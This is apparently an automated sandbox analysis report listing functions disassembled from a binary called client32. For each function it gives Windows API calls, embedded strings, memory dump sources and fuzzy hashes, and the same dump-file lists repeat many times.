                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClassLoad$CursorIconInfoRegister
                                                                                                                                                                                • String ID: NSMClassList
                                                                                                                                                                                • API String ID: 2883182437-2474587545
                                                                                                                                                                                • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                                                                                                • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                                                                                                                                • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                                                                                                                                • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                                                                                                                                Function 11145660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadStringA.USER32(00000000,?,00000000,11093521), ref: 11145678
                                                                                                                                                                                • wsprintfA.USER32 ref: 1114568E
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LoadStringwsprintf
                                                                                                                                                                                • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                                                                                                                                • API String ID: 104907563-3240211118
                                                                                                                                                                                • Opcode ID: 57a978d797890efa6cc4f2a6b8d44b07b96499fa5f87410358cd0a23f89ae99e
                                                                                                                                                                                • Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
                                                                                                                                                                                • Opcode Fuzzy Hash: 57a978d797890efa6cc4f2a6b8d44b07b96499fa5f87410358cd0a23f89ae99e
                                                                                                                                                                                • Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9
                                                                                                                                                                                Function 1101D660 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41registrywindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadIconA.USER32(00000000,0000139A), ref: 1101D6BF
                                                                                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 1101D6CF
                                                                                                                                                                                • RegisterClassExA.USER32(00000030), ref: 1101D6F1
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 1101D6F7
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Load$ClassCursorErrorIconLastRegister
                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                • API String ID: 1253014879-4108050209
                                                                                                                                                                                • Opcode ID: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                                                                                                                • Instruction ID: bb5add8fba7068f0a6842358c407e6d623dbc87194615988f67ff79f51c59528
                                                                                                                                                                                • Opcode Fuzzy Hash: 3930a523114ad92cde405aa5e8b1e4ad5260e767829dc4e3c1f988ce6b908f11
                                                                                                                                                                                • Instruction Fuzzy Hash: E1018074C5031DABEB00DFE0CD59B9DBBB4AB0830CF004429E525BA680EBB91104CB99
                                                                                                                                                                                Function 11145450 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,11037F05), ref: 11145463
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11145475
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                                                                                                                                • API String ID: 145871493-545709139
                                                                                                                                                                                • Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                                                                                                                • Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
                                                                                                                                                                                • Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                                                                                                                                • Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765
                                                                                                                                                                                Function 110ED0D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                                                                                                                                • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                                                                                                                                • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                                                                                                                                • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                                                                                                                                • API String ID: 2446111109-1196874063
                                                                                                                                                                                • Opcode ID: c2c59d5d343351acc4f1b7bf400a37e7fd9f5090174b34caec2d8743372f58b2
                                                                                                                                                                                • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                                                                                                                                • Opcode Fuzzy Hash: c2c59d5d343351acc4f1b7bf400a37e7fd9f5090174b34caec2d8743372f58b2
                                                                                                                                                                                • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                                                                                                                                Function 11017420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017428
                                                                                                                                                                                • GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
                                                                                                                                                                                • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017458
                                                                                                                                                                                • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageWindow$FindLongPostSend
                                                                                                                                                                                • String ID: IPTip_Main_Window
                                                                                                                                                                                • API String ID: 3445528842-293399287
                                                                                                                                                                                • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                                                                                                • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                                                                                                                                • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                                                                                                                                • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                                                                                                                                Function 11067340 Relevance: 7.6, APIs: 5, Instructions: 121COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __fread_nolock$__fseeki64__ftelli64_free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3623291178-0
                                                                                                                                                                                • Opcode ID: ff2be810197ed47c3a282426f1c26504dad6ece8efc65bf3c19c97d5579d3216
                                                                                                                                                                                • Instruction ID: 8dad8ca0cb6ce958af6f574ebf9c932ca291dbbc5f86ee7068fec00a54acc110
                                                                                                                                                                                • Opcode Fuzzy Hash: ff2be810197ed47c3a282426f1c26504dad6ece8efc65bf3c19c97d5579d3216
                                                                                                                                                                                • Instruction Fuzzy Hash: EE31B575F00619ABD704DF699C81BAEF7ADEF84218F148169E90997280FBB2A910C791
                                                                                                                                                                                Function 1111B5D0 Relevance: 7.6, APIs: 5, Instructions: 116windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetStockObject.GDI32(00000000), ref: 1111B613
                                                                                                                                                                                  • Part of subcall function 11113D20: _memmove.LIBCMT ref: 11113D83
                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 1111B677
                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 1111B69F
                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 1111B6CD
                                                                                                                                                                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,00CC0020), ref: 1111B6F1
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ObjectStock_memmove
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2979131814-0
                                                                                                                                                                                • Opcode ID: 81931b63fadf43f4a5e3858e067347d5526a70c6a541e416c2a92d87b340b5de
                                                                                                                                                                                • Instruction ID: 92b8e22ea7e4688bb1be41d709802a1928e2f32718a1b5f8dbc669fb6f1dc32a
                                                                                                                                                                                • Opcode Fuzzy Hash: 81931b63fadf43f4a5e3858e067347d5526a70c6a541e416c2a92d87b340b5de
                                                                                                                                                                                • Instruction Fuzzy Hash: 554195B5A11219BFDB04CAA8D985EAFF7BDFB8C614F104229F915A3244D670BD008BB4
                                                                                                                                                                                Function 110CF7D0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,2520CF5D,00000000,00000000,00000000,110CF110,?,00000001), ref: 110CEE2A
                                                                                                                                                                                  • Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEE92
                                                                                                                                                                                • IsWindow.USER32(?), ref: 110CF82B
                                                                                                                                                                                  • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                                                                                                                • RemovePropA.USER32(?), ref: 110CF858
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110CF86C
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110CF876
                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 110CF880
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1921910413-0
                                                                                                                                                                                • Opcode ID: 10c64280674085a41fac7b5b1a4c617e91840eb6bc61a0bdd540c087783f9b8e
                                                                                                                                                                                • Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
                                                                                                                                                                                • Opcode Fuzzy Hash: 10c64280674085a41fac7b5b1a4c617e91840eb6bc61a0bdd540c087783f9b8e
                                                                                                                                                                                • Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2
                                                                                                                                                                                Function 11081590 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                                                                                                                                • %02x, xrefs: 11081610
                                                                                                                                                                                • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: wsprintf
                                                                                                                                                                                • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                                                                                                                • API String ID: 2111968516-476189988
                                                                                                                                                                                • Opcode ID: 12ab4e151833c8805a57f749dcce1cd84448ef635fb19afac17aafbdf13c20b2
                                                                                                                                                                                • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
